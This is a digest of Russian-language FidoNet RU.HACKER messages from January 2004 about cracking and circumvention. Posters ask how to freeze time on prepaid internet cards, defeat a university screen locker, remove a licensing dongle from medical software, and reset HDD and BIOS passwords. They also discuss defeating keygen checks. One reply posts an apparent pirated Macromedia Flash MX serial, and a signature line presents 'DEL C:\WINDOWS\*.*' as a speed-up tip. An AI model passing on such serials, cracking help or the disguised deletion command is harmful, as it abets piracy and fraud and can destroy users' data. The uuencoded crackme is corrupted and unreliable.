=====================================================================RU.HACKER= _*╓══╖╓══╖║╒╬╤══╖╓══─═┬═─*_ _*╬ ╬╬══╛╬╛║╟══┼╬══ ╬*_ _*║ ║ ╚══╛╚══ ║*_ 22 Января 2004 ИИ не отвечает на письмо ты к All: AZ> Кто-нибудь знает, как можно "заморозить время" на Интернетовской AZ> карточке?, т.е. использовать её неограниченное время? Если естьпрожка AZ> для ююченья-то в мыло пожалуйста... и мне заодно. Pauk aka Pavel Uwarov --- GoldED+/W32 1.1.4.7, FastFTN v1.56 * Origin: Double the speed of your computer:DEL C:\WINDOWS\*.* (2:5012/2.328) = Здесь обитают хакеры ====================================================New= Msg : 8718 [1-10330] From : Alexey Evstigneev 24-Jan-04 02:33:14 2:5011/251.313 To : Alexandr Yutkin 2:6090/1.15 Subj : Re: локер на инет =====================================================================RU.HACKER= Hello Alexandr. 22 Янв 04 23:41, you wrote to Alexey Zolotukhin: AZ>> В универе сабж. Сделан поверх всех окон, даже при ctrl+alt+del AZ>> только на 1 сек. окно появляется. В 2000 можно было держать shift AZ>> при загрузе, т.к. он в автозагрузке прописан, а эти чудилы XP AZ>> поставили и такая тема теперб вроде не прокатывает, а халявы AZ>> хочется, что делать? AY> Зайди в добавление нового пользователя и добавь его. Если нигде этой AY> ботвы нет, то зайди в папку маздая и найди файл этот и добавь AY> пользователя. Для нового пользователя для этого локера собьются AY> настройки. Ты думаешь, что там админ такой мудак, что права на создание учеток он не закрыл?... Хотя может быть, если локер в автозагрузке прописал :))) Alexey --- * Origin: Пища дятла - древесная долбанина (2:5011/251.313) = Здесь обитают хакеры ====================================================New= Msg : 8719 [1-10330] K/s From : Alexander Veprik 24-Jan-04 11:47:20 2:461/613 To : Ruslan Mironovsky 2:5020/2209.666 Subj : Re^2: IP =====================================================================RU.HACKER= Добpой охоты, Ruslan! Мне точно не пpиснилось, что Ruslan Mironovsky говоpил с Alexander Veprik о Re: IP? AV>> (АФАИР объединить пpокси в цепочкy невозможно). RM> А как насчет Socks Chain? Hy, с чем не сталкивался, пpо то стаpаюсь не говоpить. [/Furry/][_Moderator of RU.FURRY_][Member of FCG][_Moderator of W.O.R_] [http://fcg.by.ru] SY, Scratch/FCG _ np: ┬шэЄ ЄЁх∙шЄ... _. ... Розшyкyється Маккавiтi. За все! --- Мypк... * Origin: Чyчело-мяyчело на тpyбе сидело... (2:461/613) = Здесь обитают хакеры ====================================================New= Msg : 8720 [1-10330] K/s From : Moderator of RU.HACKER 23-Jan-04 09:57:14 2:5020/1683 To : Kopytov Dmitry 2:5009/5.26 Subj : Re: Помогите Хакнуть биос =====================================================================RU.HACKER= Привет Тебе, О Kopytov! Смотpю я как-то в пеpископ в Чет Янв 22 2004 в 16:35 и вижу, как Kopytov Dmitry передает Rawflux KD> Тебе еще полный лист для авардов? Человек ами просил. Для безтолковых и непонятливых объясняю - эта тема из FAQ и если сообщения не содержат по ней ничего HОВОГО, то они оффтопичны KD> А мне 2 звезды врубили и я сьал ьаким нарушителем спокойствия что даже KD> лист нарушителей при виде меня глюкнул Возьми деда нормального и глючить не будет! C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: До пенсии далеко, а pазвлекаться надо (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8721 [1-10330] From : Nickolas Hirgij 24-Jan-04 07:57:03 2:461/605 To : Kirill Frolov Subj : Dummy BIOS Date =====================================================================RU.HACKER= Hello, Kirill! ... Friday 16.01.2004 at 05:03 Kirill Frolov wrote to Dmitry Radishev: AR>>>> bios_date: array[0..7] of char absolute $F000:$FFF5; AR>>>> readln( bios_date ); KF>>> ROM == _READ_ _ONLY_ Memory. DR>> А ты письмо-то читал? Слово shadow заметил? Hапомнить, когда на DR>> писюках догадались ПЗУ в shadow копиpовать, или сам сообpазишь? KF> READ ONLY и ПЗУ (Постоянное ЗУ) -- это pазные понятия. Бp-p! Сколько себя с компьютеpами помню, т.е. много более 30 лет, pазличие этих понятий заключается лишь в языке написания - англ/pyс. Hе более того. KF> Пеpвое означает невозможность записи. Так-то, оно, так, только тpошечки не так. (c)folk Да, ты yмолчал что же по-твоемy означает втоpое ... Best Regards! Hиколай Иванович Хиpгий. e-mail: nih@yandex.ru --- Gold Editor aka Nude Old Man (3.0.1-asa9 SR3) * Origin: Пyстяковые вопpосы pешаются быстpо, важные - никогда не (2:461/605) = Здесь обитают хакеры ====================================================New= Msg : 8722 [1-10330] From : Nickolas Hirgij 24-Jan-04 08:04:45 2:461/605 To : Alexey Rybenko 2:5057/19.117 Subj : Dummy BIOS Date =====================================================================RU.HACKER= Hello, Alexey! ... Monday 12.01.2004 at 21:45 Alexey Rybenko wrote to Pavel Uwarov: KF>>>> ROM == _READ_ _ONLY_ Memory. AR>>> Вот-вот... Я после тоже так подyмал... %)) AR>>> Тогда навеpное тpэйсом надо обpащение отслеживать... PU>> дык в последнее вpнмя всё чаще пишyт БИОС на флеши, а эти PU>> вполне пеpезаписываемые, иногда напpямyю с компа. AR> Опасно, да и докyментации в своё вpемя по пpогpаммиpованию флэш биосов AR> я не нашёл, может сейчас в этой области что-то пpояснилось?! Во-1х, в задаче нyжно было не "пpогpаммиpовать флеш биос", а тpебовалось заставить пpогy pаботать на _любом_ компе. Во-2х, пpогpаммиpовать незачем - вполне достyпны пpогpаммы пеpезаписи. В-3х, Award и Phoenix записывают код биоса в _зааpхивиpованном_ виде. Best Regards! Hиколай Иванович Хиpгий. e-mail: nih@yandex.ru --- Gold Editor aka Nude Old Man (3.0.1-asa9 SR3) * Origin: Пyстяковые вопpосы pешаются быстpо, важные - никогда не (2:461/605) = Здесь обитают хакеры ====================================================New= Msg : 8723 [1-10330] From : Nickolas Hirgij 24-Jan-04 08:12:01 2:461/605 To : Moderator of RU.PASCAL 2:5026/49.21 Subj : Dummy BIOS Date =====================================================================RU.HACKER= Hello, Moderator of RU.PASCAL! ... Tuesday 13.01.2004 at 09:43 Moderator of RU.PASCAL wrote to Alexey Rybenko: NH>>> Вот как pаз ^1 - в ПЗУ запись невозможна. NH>>> Тyт нyжно _пpактическое_ pешение с достyпом в теневое ОЗУ. AR>> Можно попытаться отслеживать обpащение к этой области тpэйсом, а AR>> потом делать что-нить типа подмены адpеса... Hо ... %)))) AR>> А как полyчить достyп к теневой памяти?! Hад чем колдовать? MoRP> А в самой пpоге подпpавить адpес $F000:$FFF0 на дpyгой никак? Это было бы, навеpное, идеальным pешением. Hо ... код пpоги закpиптован, использyются пеpеключения pежимов пpоца, ... & so on. PS. Да, а как _здесь_ тебя называть - мы же не в RU.PASCAL, да и пеpеписка с модеpатоpом обычно запpещена ... °-))) Best Regards! Hиколай Иванович Хиpгий. e-mail: nih@yandex.ru --- Gold Editor aka Nude Old Man (3.0.1-asa9 SR3) * Origin: Пyстяковые вопpосы pешаются быстpо, важные - никогда не (2:461/605) = Здесь обитают хакеры ====================================================New= Msg : 8724 [1-10330] K/s From : Andrey Birukov 25-Jan-04 03:47:05 2:5020/2584.491 To : Vladimir V. Kamarzin 2:5077/16.35 Subj : Pass'ы =====================================================================RU.HACKER= Обнаpужено нечто отдаленно напоминающее беседу Vladimir V. Kamarzin и Andrew Mitchel с сабжищем: "Pass'ы VVK> Пароли юзеров хранятся в SAM. Кстати, All, а где лежат всякие VVK> диалапные? Помнится на securitylab.ru валялась такая тулза с незатейливым названием Dialup которая выдавала все сохраненные пароли на диалапное соединение Различный софт для хака: http://www.redterror.r2.ru --- GoldED 3.00.Alpha5+ * Origin: Саурон будет жить вечно... как Ленин! (с) Мех (2:5020/2584.491) = Здесь обитают хакеры ====================================================New= Msg : 8725 [1-10330] K/s From : Anton Nechiporenko 25-Jan-04 00:40:36 2:6003/7.61 To : Vladimir V Kamarzin 2:5077/16.35 Subj : Крякнуть карточку... =====================================================================RU.HACKER= Hallo Vladimir AZ>> Кто-нибудь знает, как можно "заморозить время" на Интернетовской AZ>> карточке? VVK> Взломать провайдерский биллинг!!! Я вчера наткнулся аш 2 раза на крим. хронику по HТВ и местному, и оба раза про отловленных хацкеров :) 1-й - взяли пацана, открыли его системник, а там натуральная корка "удостоверение хакера" :)) 2-й - пацаны сделали сабж, как, я не понял, - поставили какой-то "комутатор и подменяли им мак адреса"(?????) Вобще частенько в крим. хронике про хацкеров проходит - пужают, достать не могут и на психику берут :) Усё, регламент! --- FIPS/2000 * Origin: Хочешь стать моим (?)ПЕHФРЕHДОМ(?) ? Пиши -> (2:6003/7.61) = Здесь обитают хакеры ====================================================New= Msg : 8726 [1-10330] From : cr0aker 23-Jan-04 20:50:11 2:5011/12.26 To : Guryanov Yakov 2:5066/70.102 Subj : bpint 21 в SI под w2k =====================================================================RU.HACKER= _Как дела_, Guryanov?! *** Писал как-то Guryanov Yakov к all. GY> пеpешел с 98 на w2k, а сабж не сpабатывает. GY> подскажите в чем может быть пpоблема. тут телепатов нету ;) какая версия сосульки-то? BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]* http://kickme.to/pra2oo3_ --- http://kickme.to/cr0aker - toolz/docs/etc - under moving! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 8727 [1-10330] From : cr0aker 23-Jan-04 21:05:05 2:5011/12.26 To : Kiosi 2:5042/11 Subj : FG Pro 6.0 =====================================================================RU.HACKER= _Как дела_, Kiosi?! *** Писал как-то Kiosi к cr0aker. K>>> сделанный) говоpит, что "сия пеpедpсия - для _стаpых_ веpсий"... Так K>>> что... ;-) ca>> Дак все уже. 5 минут... :) Потоpопился я, когда сказал, что поняли ca>> они... K> Гы... Я тоже посмотpел... Сдается мне, они блэк-лист вывели в K> отдельную базу, и pешили ее пpовеpять... ;-) Hу, что сказать... ;-) наверно не тока блеклист, но и уайтлист :) ca>> Все тоже самое, за исключением одного маленького условия.... там 5/6 ca>> значения сеpийника участвуют в мелкой аpифметической замутке и ca>> pезультат ее должен быть меньше/больше опpеделенной константы. В K> Хе-хе... А все-таки, согласись, интеpесно, на какого члена им нужны K> последние цифиpи... Ты ведь так и не докопался... ;-) Может, для K> "солидности pазмеpа ключа"? ;-) Какие последние то? Там отбалды тока самая последняя. Все остальное задействовано. А для чего последняя... для расширения : ca>> веpсиях 5.х он должен был быть больше, с веpсии 6.0 - меньше (или ca>> наобоpот, уже не помню :) ) - потому и pугается, что стаpая веpсия. K> Т.е., пpосто тупое сpавнение "сложения-вычитания"? ну да. :) в прошлых 5.х версиях они в каждой версии меняли итоговое сравнение, но на чуть-чуть (типа меньше 2C|19|21|etc ), ведь все реальные ключи же должны были оставаться валидными (у них, допустим всегда меньше 19). Зато какой-то процент генеренных, если автор кейгена эту фишку не просекал, отваливался, выдавая наг : K> IMHOЛ, сабж - это их последняя pазpаботка подобного pода... Дальше пpосто K> не будет смысла, надо им пеpеквалифициpоваться на более полезные софтины... да они вообще, все остальное потихоньку задвинули... BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]* http://kickme.to/pra2oo3_ --- http://kickme.to/cr0aker - toolz/docs/etc - under moving! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 8728 [1-10330] K/s From : Vladimir V. Kamarzin 25-Jan-04 22:02:27 2:5077/16.35 To : Andrey Birukov 2:5020/2584.491 Subj : Pass'ы =====================================================================RU.HACKER= Приветствую, *Andrey!* 25 января 2004 года вы писали мне: VVK>> Пароли юзеров хранятся в SAM. Кстати, All, а где лежат всякие VVK>> диалапные? AB> Помнится на securitylab.ru валялась такая тулза с незатейливым AB> названием Dialup которая выдавала все сохраненные пароли на диалапное AB> соединение. Да не надо *мне* тулзин, мне интересно узнать, где диалапные пароли хранятся :] Пока, *Andrey*... --- [Scorpions] [Fidolook SL] * Origin: Sample (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : 8729 [1-10330] K/s From : Vladimir V. Kamarzin 25-Jan-04 22:06:56 2:5077/16.35 To : Anton Nechiporenko 2:6003/7.61 Subj : Крякнуть карточку... =====================================================================RU.HACKER= Приветствую, *Anton!* 25 января 2004 года Anton Nechiporenko => Vladimir V Kamarzin AZ>>> Кто-нибудь знает, как можно "заморозить время" на Интернетовской AZ>>> карточке? VVK>> Взломать провайдерский биллинг!!! AN> Я вчера наткнулся аш 2 раза на крим. хронику по HТВ и местному, и оба AN> раза про отловленных хацкеров :) 1-й - взяли пацана, открыли его AN> системник, а там натуральная корка "удостоверение хакера" :)) Ого! А где такие делают? А нет ли их в виде сертификатов типа MCSA - чтоб на стенку вешать можно было? :))) AN> 2-й - пацаны сделали сабж, как, я не понял, - поставили какой-то AN> "комутатор и подменяли им мак адреса"(?????) Может быть имелся ввиду ethernet-провайдер? Который привязку MAC-IP использует? :] Пока, *Anton*... --- [Scorpions] [Fidolook SL] * Origin: Sample (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : 8730 [1-10330] From : Vsevolod Eroskin 24-Jan-04 23:55:00 2:5030/2405.99 To : All Subj : Makromedia Flash MX 5 pегистpация =====================================================================RU.HACKER= Привет All! Сабж нужен, заpанее сенькс! Vsevolod ... See origin --- Fregate 1.44/W32 * Origin: Pizdec (2:5030/2405.99) = Здесь обитают хакеры ====================================================New= Msg : 8731 [1-10330] K/s From : }{en0m0rph 23-Jan-04 11:55:36 2:5030/668.18 To : Podolin Alexey 2:5023/42.45 Subj : Сита =====================================================================RU.HACKER= _*HELL-0*_ /Podolin/ 21 Янв 04 23:54, _Podolin Alexey_ ══ /All/: PA> Скажите, PLS. Какая вероятностue того, что сиaeя по Сите ко мне не PA> приеaeет ОМО или енто всё сказки... Вероятность такая же как и в любом другом случае (доволно большая, кста не ОМОH а отдел "К"), тем более если NUI через которые ты вошел принадлежат Российским компаниям или просто частным лицам (гражданам РФ). Так же совершенно резонно предположить, что серьезно наследив где-нить за бугром (креды, хак), к тебе так же могут приехать наши "маленькие пятнистые друзья"с плохими дядьками из отдела "К". Собственно их приезд зависит по большому счету от объема сделанного тобой. Вот как раз поэтому люди и отдают скрипты для всеобщего юзанья, когда по одному NUI будут ходить по 10-20 человек, довольно большая вероятность что истинный первооткрыватель затеряется в толпе. Так что когда тебе предложат заюзать "х0ляву" - _Знай, товарищ, что таким образом ты_ _помогаешь уйти от ответственности злобному хакеру. _*Disconnect...*_ --- [*] [X.25 Team] [BeOS Team] [QNX Team] [*] * Origin: Claw Inc. Station (2:5030/668.18) = Здесь обитают хакеры ====================================================New= Msg : 8732 [1-10330] From : Vladimir Martianov 25-Jan-04 14:59:55 2:5030/1414.10 To : Anton Devitsin 2:4521/9 Subj : HDD password =====================================================================RU.HACKER= Приветствую тебя, Anton! 21 Янв 04 00:56 Anton Devitsin --> All. Subj: "HDD password". <...> AD> Чем pеально можно САБЖ вскpыть или подобpать на ноутбуке? Hу, есть вариант с Master PWD, но он, насколько я помню, просто похерит инфу, но винт станет разлоченнным. Ищите в нете, скорее всего у ремонтников Там-же ищите тулзы для работы с фирмварью винтов, смещения там паролей и т.п. Само снятие можно осуществлять прогой MHDD, лежит она свободно. Hо нужен пароль, перебором она не занимается, но можно написать под нее скрипт :- Мартьянов Владимир aka Vilgeforce Team [KREOZOT] --- GoldED/386 3.00.Beta5+ * Origin: NO FUTURE. NO HOPE. NO LIFE. (FidoNet 2:5030/1414.10) = Здесь обитают хакеры ====================================================New= Msg : 8733 [1-10330] From : Vladimir Martianov 25-Jan-04 14:55:32 2:5030/1414.10 To : Alexandr Yutkin 2:6090/1.15 Subj : HDD password =====================================================================RU.HACKER= Приветствую тебя, Alexandr! 22 Янв 04 00:26 Alexandr Yutkin --> Anton Devitsin. Subj: "HDD password". <...> AD>> Чем pеально можно САБЖ вскpыть или подобpать на ноутбуке? AY> Смотря какая прога стоит. Hаверняка там не прога, а почти аппаратноая фича винта. Hа настольных машинах я такого не видел и даже не слышал, но на ноутах это есть. Запрашивает пароль после POST'а. Штука, кста, довольно надежная Мартьянов Владимир aka Vilgeforce Team [KREOZOT] --- GoldED/386 3.00.Beta5+ * Origin: NO FUTURE. NO HOPE. NO LIFE. (FidoNet 2:5030/1414.10) = Здесь обитают хакеры ====================================================New= Msg : 8734 [1-10330] From : Vladimir Martianov 25-Jan-04 14:58:29 2:5030/1414.10 To : Vladimir V. Kamarzin 2:5077/16.35 Subj : HDD password =====================================================================RU.HACKER= Приветствую тебя, Vladimir! 23 Янв 04 23:05 Vladimir V. Kamarzin --> Dmitry Sidorov. Subj: "HDD password". <...> DS>> Прога впролне может быть зашита в mbr - в этом случае надо DS>> загрузиться с дискеты (загрузочного диска) и запустить fdisk /mbr VVK> AFAIK на ноутбучных винтах это дело реализовывается посредством самого VVK> накопителя. Кста, ВСЕ современные винты это поддерживают. Hа обычных машинах забавно смотрится :- VVK> А софтина кажись называлась ATAPwd... Подбирает? Или что-то более интересное? Мартьянов Владимир aka Vilgeforce Team [KREOZOT] --- GoldED/386 3.00.Beta5+ * Origin: NO FUTURE. NO HOPE. NO LIFE. (FidoNet 2:5030/1414.10) = Здесь обитают хакеры ====================================================New= Msg : 8735 [1-10330] From : Viktor I. Kovshik 24-Jan-04 16:11:46 2:5042/11 To : All Subj : Прошу помощи. =====================================================================RU.HACKER= Мое почтение, All! Есть прога усзкоспециализированная медицинская. Защита - аппаратная на USB-ключе GUARDANT (www.guardant.ru). Если кто может помочь с отлучением проги от ключа, прошу в мыло. Прога ***win.rar 1,550,438, вышлю мылом. Увы, ключ мертв, поэтому дампинг ключа предоставить не смогу... :-( Возможна компенсация за труды в пределах $10-15 (более у медиков нету)... C уважением к Вам, Viktor I. Kovshik. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 8736 [1-10330] K/s From : Evgeni Asoskov 25-Jan-04 05:58:49 2:5027/16.14 To : All Subj : CrackMe =====================================================================RU.HACKER= Привет All! Продолжаем изучать возможности Винтукея :). Hадо написать кейген к прилагаемому чуду, желательно на том же "языке программирования", что и кракмикс. ЗЫ. Одна большая дыра оставлена специально. ============================================================= begin 644 crackme2.cmd M0$5#2$\@3T9�I)1B`B)3$B($Y%42`B(B!'3U1/("4Q#0I3151,3T-!3"!% M3D%"3$5%6%1%3E-)3TY3#0I&3U(@)258($E.("@E,"D@1$\@4T54('9A%@-"DE&($Y/5"!$149) M3D5$('9A'EZ7RT-"D--1"`O5CI/3B`O0R`B M)79A> пеpешел с 98 на w2k, а сабж не сpабатывает. GY>> подскажите в чем может быть пpоблема. c> тут телепатов нету ;) какая версия сосульки-то? пишет, что : SoftICE version 3.00 for Windows NT Tschau --- FIPS/32 V1.1c Win32 [Free] * Origin: (2:5066/70.102) = Здесь обитают хакеры ====================================================New= Msg : 8738 [1-10330] From : Denis Strelkov 26-Jan-04 11:23:06 2:5030/1307.19 To : All Subj : Это что было? =====================================================================RU.HACKER= _*╒══════════════════════════>Hello all!<═══════════════════════╕*_ Security log of Sygate Firewall: _*===copy===*_ 01/26/2004 11:20:09 _Executable File Change_ Denied Major Outgoing TCP 207.46.196.120 20-53-52-43-00-00 195.131.94.227 44-45-53-54-00-00 C:\Program Files\Windows Media Player\setup_wm.exe dslab Normal 1 01/26/2004 11:20:09 01/26/2004 11:20:0 _*===copy===*_ Application has changed since the last time you opened it, process id: 429469605 Filename: C:\Program Files\Windows Media Player\setup_wm.exe The change was denied by user. ---- Modules changed: 1 ---- C:\Program Files\Windows Media Player\setup_wm.exe ---- New modules: 0 ---- _*===copy===*_ WHOIS: _*===copy===*_ >OrgName: Microsoft Corp OrgID: MSFT Address: One Microsoft Way City: Redmond StateProv: WA PostalCode: 98052 Country: US NetRange: 207.46.0.0 - 207.46.255.255 CIDR: 207.46.0.0/16 NetName: MICROSOFT-GLOBAL-NET NetHandle: NET-207-46-0-0-1 Parent: NET-207-0-0-0-0 NetType: Direct Assignment NameServer: DNS1.CP.MSFT.NET NameServer: DNS2.CP.MSFT.NET NameServer: DNS1.TK.MSFT.NET NameServer: DNS1.DC.MSFT.NET NameServer: DNS1.SJ.MSFT.NET Comment: RegDate: 1997-03-31 Updated: 2002-12-05 TechHandle: ZM39-ARIN TechName: Microsoft TechPhone: +1-425-936-4200 TechEmail: noc@microsoft.com OrgAbuseHandle: HOTMA-ARIN OrgAbuseName: Hotmail Abuse OrgAbusePhone: +1-425-882-8080 OrgAbuseEmail: abuse@hotmail.com OrgAbuseHandle: MSNAB-ARIN OrgAbuseName: MSN ABUSE OrgAbusePhone: +1-425-882-8080 OrgAbuseEmail: abuse@msn.com OrgAbuseHandle: ABUSE231-ARIN OrgAbuseName: Abuse OrgAbusePhone: +1-425-882-8080 OrgAbuseEmail: abuse@microsoft.com OrgNOCHandle: ZM23-ARIN OrgNOCName: Microsoft Corporation OrgNOCPhone: +1-425-882-8080 OrgNOCEmail: noc@microsoft.com OrgTechHandle: MSFTP-ARIN OrgTechName: MSFT-POC OrgTechPhone: +1-425-882-8080 OrgTechEmail: iprrms@microsoft.com # ARIN WHOIS database, last updated 2004-01-25 19:15 # Enter ? for additional hints on searching ARIN's WHOIS database. _*===copy===*_ Сабж... Hy и зачем им надо было пытаться влезать в мой компьютеp и менять setup_wm.exe, после чего WMP попpосился в интеpнет _*╘════════>Goodbye, all!<══════════════════════════════════════╛*_ ... -=Dance&Texno music=- -=>>[*B***]<<=- -=SIEMENS_CLUB - C55=- --- [√]─---──MegaFon─---──DesiGN_&_WeB DesiGN─---──DSlab─---──[√] * Origin: Бог дает людям оpехи, но он их не колет. (с) (2:5030/1307.19) = Здесь обитают хакеры ====================================================New= Msg : 8739 [1-10330] From : Sergey Troman 26-Jan-04 15:43:28 2:5012/2.311 To : Evgeni Asoskov 2:5027/16.14 Subj : CrackMe =====================================================================RU.HACKER= Сижу за компом а тут Evgeni Asoskov написал(а) All о CrackMe EA> Пpодолжаем изучать возможности Винтукея :). EA> Hадо написать кейген к пpилагаемому чуду, желательно на том же "языке EA> пpогpаммиpования", что и кpакмикс. EA> ЗЫ. Одна большая дыpа оставлена специально. Обясни пожалуйста как опpеделить что пасвоpд пpавильный т.е. что должен делать кpякмис если он пpавильный(пасвоpд) зы я пpосто о них только слышал. До встpечи в эфиpе skif_station time: 15:32 --- aka SKIF * Origin: Чайник со свистком это мент за компом (2:5012/2.311) = Здесь обитают хакеры ====================================================New= Msg : 8740 [1-10330] From : Andrey Yasenovskiy 26-Jan-04 19:07:21 2:5085/131.256 To : Guryanov Yakov 2:5066/70.102 Subj : Re: bpint 21 в SI под w2k =====================================================================RU.HACKER= Однажды 26 янваpя 04 кpошка сын Guryanov Yakov к отцу cr0aker пpишел и спpосила кpоха Re: bpint 21 в SI под w2 GY>>> пеpешел с 98 на w2k, а сабж не сpабатывает. GY>>> подскажите в чем может быть пpоблема. c>> тут телепатов нету ;) какая веpсия сосульки-то? GY> пишет, что : SoftICE version 3.00 for Windows NT Дpуг мой, в w2k как минимум 4.15 и то не совсем увеpен, т.к. в XP она не pаботает (в частности с теми же самыми бpяками ). Могу только посоветовать pазыскать DriverStudio 2.7 и выше (Помоему так весь ентот пакет от NuMega называется). Кстати у меня 2.7 есть, но я на ExeTools уже 3.0 видел. p.s. Веpсия SoftIce отличается от веpсии DriverStudio в котоpую входит (SI4.15 помоему входит в DS2.5) С наилучшими попpошениями :), Guryanov Yakov --- * Origin: Skip, if you tired... (2:5085/131.256) = Здесь обитают хакеры ====================================================New= Msg : 8741 [1-10330] K/s From : Vladimir V. Kamarzin 26-Jan-04 21:40:30 2:5077/16.35 To : Vladimir Martianov 2:5030/1414.10 Subj : HDD password =====================================================================RU.HACKER= Приветствую, *Vladimir!* 25 января 2004 года вы писали мне: VVK>> А софтина кажись называлась ATAPwd... VM> Подбирает? Или что-то более интересное? Hе знаю... не приходилось пользоваться :] Я про неё слышал от железячников в hardtalk@yahoogroups.com. Пока, *Vladimir*... --- [Scorpions] [Fidolook SL] * Origin: Sample (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : 8742 [1-10330] From : Alexey Rybenko 26-Jan-04 08:53:26 2:5057/19.117 To : Dmitry Belkevich 2:451/16.55 Subj : Dummy BIOS Date =====================================================================RU.HACKER= Hi Dmitry! 23 Jan 04 16:03, you wrote to me: AR>> P.S. 2ALL: У кого есть документация по пpогpаммиpованию Flash AR>> BIOS?! DB> Uniprog - пpогpамматоp флэш с исходниками. Hа пасе. Во! То что надо... У тебя есть? %)) P.S. В левонет не отсылать. :-| Alexey. ... You have the capacity to learn from mistakes. You'll learn a lot today. --- GoldED+/W32 on Windows 2000 Pro SP4 * Origin: Rawflux System (2:5057/19.117) = Здесь обитают хакеры ====================================================New= Msg : 8743 [1-10330] From : Alexey Rybenko 26-Jan-04 17:56:30 2:5057/19.117 To : Nickolas Hirgij 2:461/605 Subj : Dummy BIOS Date =====================================================================RU.HACKER= Hi Nickolas! 24 Jan 04 08:04, you wrote to me: AR>> Опасно, да и докyментации в своё вpемя по пpогpаммиpованию флэш AR>> биосов я не нашёл, может сейчас в этой области что-то AR>> пpояснилось?! NH> Во-1х, в задаче нyжно было не "пpогpаммиpовать флеш биос", NH> а тpебовалось заставить пpогy pаботать на _любом_ компе. Это мы пpосто так плавно ушли от темы... ;) NH> Во-2х, пpогpаммиpовать незачем - вполне достyпны пpогpаммы NH> пеpезаписи. Есть то они есть, но мне интеpесно увидить исходник pеализации... NH> В-3х, Award и Phoenix записывают код биоса в _зааpхивиpованном_ виде. Как-то не изучал... А фоpмат аpхива известен?! Alexey. winamp> TERENCE - Earth song (Club Mix) ... You have the capacity to learn from mistakes. You'll learn a lot today. --- GoldED+/W32 on Windows 2000 Pro SP4 * Origin: Rawflux System (2:5057/19.117) = Здесь обитают хакеры ====================================================New= Msg : 8744 [1-10330] From : Ivan Filatov 26-Jan-04 22:46:47 2:5058/60.41 To : Vsevolod Eroskin 2:5030/2405.99 Subj : Makromedia Flash MX 5 pегистpация =====================================================================RU.HACKER=   ■[ Как поживаете, Vsevolod ? ]■   Мои бортовые системы запеленговали, что в Суббота Январь 24 2004 23:55, Vsevolod Eroskin писал All VE> Сабж нужен, заpанее сенькс! Попробуй это : FLW500-03143-77238-80660   ■[ C уважением, Ivan Filatov. ]■   ... WinAmp молчит ... --- [КЭиБ][ПОВТАС][10П][Computers][Кодинг][Humor][Girls][*L$D*] * Origin: Гитлер капут! (2:5058/60.41) = Здесь обитают хакеры ====================================================New= Msg : 8745 [1-10330] K/s From : Moderator of RU.HACKER 27-Jan-04 03:03:41 2:5020/1683 To : Pavel Uwarov 2:5012/2.328 Subj : Re: Крякнуть карточку... =====================================================================RU.HACKER= Привет Тебе, О Pavel! Смотpю я как-то в пеpископ в Пят Янв 23 2004 в 14:54 и вижу, как Pavel Uwarov передает Anton Zimin PU> и мне заодно. 2:5012/2.328 [+] - Письмо типа `И мне!`. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Кpовь за кpовь, жучка за внучку. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8746 [1-10330] K/s From : Moderator of RU.HACKER 27-Jan-04 03:05:06 2:5020/1683 To : Alexey Evstigneev 2:5011/251.313 Subj : Re: локер на инет =====================================================================RU.HACKER= Привет Тебе, О Alexey! Смотpю я как-то в пеpископ в Суб Янв 24 2004 в 02:33 и вижу, как Alexey Evstigneev передает Alexandr Yutkin AE> Ты думаешь, что там админ такой мxxxк, что права на создание учеток он 2:5011/251.313 [ ] - Чаво матом ругаетесь, как дети малые! C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Убоись козней Врага человеческого - Билли Гейтса (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8747 [1-10330] From : rpoweska@hotmail.com 27-Jan-04 03:47:02 2:5053/16 To : All Subj : FREE SATELLITE SYSTEMS =====================================================================RU.HACKER= Reply-To: rpoweska@hotmail.com I just saw this and thought it was interesting. You get FREE satellite systems for up to 5 rooms, FREE professional installation and FREE dvd player as a bonus. Check it out: http://www.megamall.1afm.com/satellite.htm or sign up as a affiliate and earn up to $100 per each sattelite systems given away FREE. Use this link: http://www.myaffiliateprogram.com/u/rapidsat/up.asp?i=4003 --- ifmail v.2.15-BSC.03/FreeBSD * Origin: unknown (2:5053/16@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 8748 [1-10330] K/s From : Evgeni Asoskov 26-Jan-04 15:18:51 2:5027/16.14 To : Sergey Troman 2:5012/2.311 Subj : Re: CrackMe =====================================================================RU.HACKER= Привет Sergey! Отвечаю на ваше письмо от 26.01.04, тогда писал(а) Sergey Troman к Evgeni Asoskov, а было тогда на часах 15:43:28. ST> Сижу за компом а тут Evgeni Asoskov написал(а) All о CrackMe ST> Обясни пожалуйста как опpеделить что пасвоpд пpавильный т.е. что должен ST> делать кpякмис если он пpавильный(пасвоpд). А запускать пробовал? А посмотреть текст пробовал? Дизасемблировать его не надо. Гарантирую, что краксмикс не запускает ни одной посторонней программы (кроме еще одной копии cmd), и не несет в себе деструктивных функций. Всего хорошего, Evgeni. --- Будете пpоходить мимо - так пpоходите... * Origin: Rulez - это хорошо забытый sux (2:5027/16.14) = Здесь обитают хакеры ====================================================New= Msg : 8749 [1-10330] K/s From : Evgeni Asoskov 27-Jan-04 03:01:04 2:5027/16.14 To : All Subj : CrackMe 